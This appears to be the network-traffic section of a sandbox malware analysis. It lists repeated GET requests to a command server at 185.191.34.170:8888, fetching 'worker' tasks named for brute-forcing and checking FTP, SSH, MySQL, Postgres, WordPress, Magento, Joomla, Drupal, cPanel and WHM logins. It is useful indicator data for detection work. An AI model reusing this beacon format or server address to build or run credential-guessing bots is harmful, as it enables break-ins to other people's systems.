Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
